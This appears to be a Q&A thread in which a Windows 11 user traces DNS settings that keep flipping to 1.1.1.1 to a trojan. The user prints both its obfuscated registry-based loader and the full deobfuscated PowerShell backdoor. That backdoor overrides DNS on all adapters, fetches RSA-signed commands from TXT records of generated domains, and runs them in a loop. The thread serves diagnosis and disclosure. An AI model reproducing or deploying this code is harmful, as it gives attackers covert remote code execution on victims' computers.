# On my machine with Windows 11 22H2 the DNS settings on multiple network cards automatically change to manual after some hours

Tags: networking, dns, dhcp, windows-11-v22h2

As mentioned in the title, whenever I set the network cards to get their settings via DHCP, after some hours or on the next day I realize that the settings on multiple cards (WiFi, LAN (not physically connected) and the Tailscale interface) have changed their DNS settings to manual and the manually configured DNS is always 1.1.1.1.

I have reset the Windows network stack (`netsh int ip reset`), scanned the computer with different antivirus products for malware but nothing resulted in anything meaningful.

Is there a way to log which program creates these changes? Has anyone had the same problem and knows of some software that does that?

By the way, I do have a pihole dns server in my network that gets assigned via DHCP. Perhaps I have some software on the machine that tries to bypass that?

Other computers on the same network (also with Windows 11) don't have that problem.

Comment: Odd. Just a thought - could it have to do with GPO? See https://superuser.com/questions/1764654/how-to-enable-dns-over-https-doh-in-group-policy-on-windows-11, https://learn.microsoft.com/en-us/managed-desktop/references/windows-11-policy-settings

Comment: What are the DNS settings changing from? 1.1.1.1 is is Cloudflare. What is the router’s DNS set to?

Comment: I checked "gpresult /Scope Computer /v" and "gpresult /Scope User /v". There are no specific  GPO settings being applied to this computer.

Comment: The initial setting is to get all information from DHCP. The DNS setting is distributed via DHCP from the router and is an IP address from the local network (both IPv4 and v6). The router (AVM FritzBox) itself also uses that local address as its own DNS server.

Comment: Interesting. I monitored the system events and noticed that there is a powershell script %appdata%\GIMP\f0vCCytZ.ps1 . It's contents is:

```
#tngEIdDTAX
icm ([ScriptBlock]::Create([string]::Join('', ((gp (([regex]::Matches('AOAof9pfCLL,puorG aideMlabolG\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'qKhAo26t0H' | % { [char]$_ }))))
QQZeFvgbP
JFekEPXxTgh
QWbuFZXX
```
This expands to a script that tries to resolve some domains and if it fails changes DNS settings.

Comment: I've put the output of the [string]::Join statement here: https://gist.github.com/ngrud/7b00063c29adfa3ea88980a6f48dea12

Answer (score 0):

So in the end it was a trojan. When I deleted the powershell file that I found my antivirus picked it up, but interestingly not before.
The code that I could extract is the following. Unfortunately I could not find out how the powershell was being started...

```
.\debug.ps1
'8F628C95-FCF4-411C-B363-B3A21C9D437E';
$env:_v = 'd22062023';
get-wmiobject win32_networkadapter | % { Set-DnsClientServerAddress -InterfaceIndex $_.InterfaceIndex -ServerAddresses ("1.1.1.1","1.0.0.1") -Confirm:$false };
$ms = [IO.MemoryStream]::new();
function Microsoft {
    param (
        $windows,$linux
    )
    try {
        $dns = Resolve-DnsName -Name $windows -Type 'TXT'
        $ms.SetLength(0);
        $ms.Position = 0;
        foreach ($txt in $dns) {
            try {
                if ($txt.Type -ne 'TXT') {
                    continue;
                }
                $pkt = [string]::Join('', $txt.Strings);
                if ($pkt[0] -eq '.') {
                    $dp = ([type]((([regex]::Matches('trevnoC','.','RightToLeft') | ForEach {$_.value}) -join ''))).GetMethods()[306].Invoke($null, @(($pkt.Substring(1).Replace('_', '+'))));
                    $ms.Position = [BitConverter]::ToUInt32($dp, 0);
                    $ms.Write($dp, 4, $dp.Length - 4);
                }
            }
            catch {
            }
        }

        if ($ms.Length -gt 136) {
            $ms.Position = 0;
            $sig = [byte[]]::new(128);
            $timestamp = [byte[]]::new(8);
            $buffer = [byte[]]::new($ms.Length - 136);
            $ms.Read($sig, 0, 128) | Out-Null;
            $ms.Read($timestamp, 0, 8) | Out-Null;
            $ms.Read($buffer, 0, $buffer.Length) | Out-Null;
            $pubkey = [Security.Cryptography.RSACryptoServiceProvider]::new();
            [byte[]]$bytarr = 6,2,0,0,0,164,0,0,82,83,65,49,0,4,0,0,1,0,1,0,171,136,19,139,215,31,169,242,133,11,146,105,79,13,140,88,119,0,2,249,79,17,77,152,228,162,31,56,117,89,68,182,194,170,250,16,3,78,104,92,37,37,9,250,164,244,195,118,92,190,58,20,35,134,83,10,229,114,229,137,244,178,10,31,46,80,221,73,129,240,183,9,245,177,196,77,143,71,142,60,5,117,241,54,2,116,23,225,145,53,46,21,142,158,206,250,181,241,8,110,101,84,218,219,99,196,195,112,71,93,55,111,218,209,12,101,165,45,13,36,118,97,232,193,245,221,180,169
            $pubkey.ImportCspBlob($bytarr);
            if ($pubkey.VerifyData($buffer, [Security.Cryptography.CryptoConfig]::MapNameToOID('SHA256'), $sig)) {
                return @{
                    timestamp = ([System.BitConverter]::ToUInt64($timestamp, 0));
                    text      = ([Text.Encoding]::UTF8.GetString($buffer));
                };
            }
        }
    }
    catch {
    }
    return $null;
}
while ($true) {
    try {
        $ko = @{
            timestamp = 0;
            text      = '';
        };
        foreach ($c in (@("eu", "in"))) {
            foreach ($a in (@('you','wiki','blog','face','ny'))) {
                foreach ($b in (@('arena','store','desk','box','reads','book','times','news','share'))) {
                    try {
                        $wowo = "$a$b.$c";
                        $roro = Microsoft $wowo $wowo;
                        if ($null -ne $roro) {
                            if ($roro.timestamp -gt $ko.timestamp) {
                                $ko = $roro;
                            }
                        }
                    }
                    catch {
                    }
                }
            }
        }

        if ($ko.text) {
            $job = Start-Job -ScriptBlock ([scriptblock]::Create($ko.text));
            $job | Wait-Job -Timeout 15500;
            $job | Stop-Job;
        }
    }
    catch {
    }
    Start-Sleep -Seconds 35;
}

QQZeFvgbP : The term 'QQZeFvgbP' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At C:\Users\max\Documents\debug.ps1:3 char:1
+ QQZeFvgbP
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (QQZeFvgbP:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

JFekEPXxTgh : The term 'JFekEPXxTgh' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. and try again.
```